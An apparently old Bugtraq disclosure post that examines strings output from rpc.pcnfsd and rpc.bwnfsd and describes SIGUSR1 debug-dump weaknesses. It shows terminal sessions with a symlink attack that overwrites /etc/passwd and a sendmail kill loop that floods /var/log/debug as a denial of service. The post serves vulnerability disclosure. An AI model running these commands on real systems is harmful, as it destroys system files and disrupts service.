About rpc.* programs and SIGUSR1 signal...

[duncan () mygale org (ga)]

After the recent messages on bugtraq about the security holes present in
the
RPC pcnfsd program, I had a quick glance at it (of course, it was quick
because I don't have the source code of /usr/sbin/rpc.* files). This is
not
big deal because it doesn't give anything new :

`/usr/bin/strings /usr/sbin/rpc.pcnfsd` :
(only interesting lines have been kept)
----------------------------------
strcpy
popen
system
chmod
mkdir
;|&<>`'#!?*()[]^/
ps630 -s %c%c -p %s -f
/usr/bin/lpr -P%s -C%s -J%s %s
/usr/bin/lpq -P%s
/usr/sbin/lpc status %s
/usr/bin/lprm -P%s %s
$FILE
$USER
$HOST
/var/spool/pcnfs
/usr/bin/lpr $FILE
----------------------------------
This only means that "system()" is effectively called as well as
"strcpy()"
(it's not a big clue but there may be somewhere a buffer overflow).
Also, the
string ";|&<>`'#!?*()[]^/" contains all the escaped shell characters
that are
removed from the printer name (and others things). Moreover, the command
line
"/usr/bin/lpr $FILE" may be interesting.. I also remember a quite old
exploit
program on rootshell called slugger also related to the chmod() problem.
(look at www.rootshell.com/archive-j457nxiqi3gq59dv/199707/pcnfsd.c.html
for
more infos).

Anyway, as I told you, a "strings rpc.pcnfsd" is not a big clue..;
however, I
also had a look at the "rpc.bwnfsd" program :

`/usr/bin/strings /usr/sbin/rpc.bwnfsd` :
(only interesting lines have been kept)
----------------------------------------------------------
strcpy
sprintf
/usr/bin/lp
bwnfsd: [default_print] print failed, unlinking print-file
bwnfsd: [default_print] unlinking %s
/tmp/bwlocks.dmp
----------------------------------------------------------
The "/tmp/bwlocks.dmp" seems to be a debug thingie.. Usually, the USR1
signal
is used by the programmer for this kind of stuff. Here, it's the case,
when the
rpc bwnfsd program receives as USR1 signal, it dumps infos to the
"/tmp/bwlocks.dmp" file; no need to say that it follows symlinks etc...
Of
course, only the root user may send a USR1 signal to the bwnfsd rpc
program so
it doesn't mean that it's a security hole because an unpriviledged user
can't
send this signal.

Mithrandir:/tmp$ id
uid=500(ga) gid=100(users) groups=100(users)
Mithrandir:/tmp$ ls -al /etc/passwd
-rw-r--r--   1 root     root          663 Sep 11 14:23 /etc/passwd
Mithrandir:/tmp$ ln -s /etc/passwd /tmp/bwlocks.dmp
Mithrandir:/tmp$ exit
exit
Mithrandir:/tmp# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),
10(wheel),11(floppy)
Mithrandir:/tmp# /usr/sbin/rpc.bwnfsd /var/spool/lpd/
Mithrandir:/tmp# kill -SIGUSR1 `pidof rpc.bwnfsd`
Mithrandir:/tmp# ls -al /etc/passwd
-rw-r--r--   1 0        root           13 Sep 24 18:03 /etc/passwd
Mithrandir:/tmp# cat /etc/passwd
File Handles
Mithrandir:/tmp#
Maybe someone will find something else more interesting than that.. I
tried
to use the signal 9 and 15 that are fired to all the processes after the
Three
Finger Salute and I saw that rpc.bwnfsd doesn't dump infos to the
bwlocks.dmp
file (hopefully).


Finally, this reminded me of an old DoS that I found long time ago but I
never
released it (sorry if it is already known). This was based on the same
USR1
signal. When sendmail receives a SIGUSR1 signal, it dumps some infos in
the
/var/log/debug file. As sendmail is suid then it runs with root
priviledge but
with the id of the user; therefore, the user is able to send the SIGUSR1
signal
because he owns the sendmail process. A quick and fast example is :

On console 1:
-------------
Mithrandir:/tmp$ id
uid=500(ga) gid=100(users) groups=100(users)
Mithrandir:/tmp$ /usr/sbin/sendmail
ga... Recipient names must be specified
--------------------------------------------

On console 2:
-------------
Mithrandir:/tmp$ id
uid=500(ga) gid=100(users) groups=100(users)
Mithrandir:/tmp$ ls -al /var/log/debug
-rw-r--r--   1 root     root       133959 Sep 24 12:15 /var/log/debug
Mithrandir:/tmp$ while :; do kill -SIGUSR1 `pidof sendmail`;done &
[1] 640
Mithrandir:/tmp$ ls -al /var/log/debug
-rw-r--r--   1 root     root       136091 Sep 24 18:31 /var/log/debug
Mithrandir:/tmp$ ls -al /var/log/debug
-rw-r--r--   1 root     root       276528 Sep 24 18:32 /var/log/debug
Mithrandir:/tmp$ ls -al /var/log/debug
-rw-r--r--   1 root     root       342830 Sep 24 18:33 /var/log/debug

I tried this on sendmail 8.8.0 (as I told you above, it has been a
longtime).
I don't have any other sendmail version so it would be interesting to
check if
this bug is reproducible on the latest version of sendmail (eg 8.9.* I
think).

As many programs uses the USR1 signal as debugging tool, some of them
might be
unsafe and can cause a DoS (as example above) or even more (root
compromise ?).
Of course, it's clear that it can only be used on suid binaries which
the
handling code of the SIGUSR1 signal have root priviledges.

I tried that on a Slackware 3.1 distribution.. quite old, I know.

                                              ga <duncan () mygale org>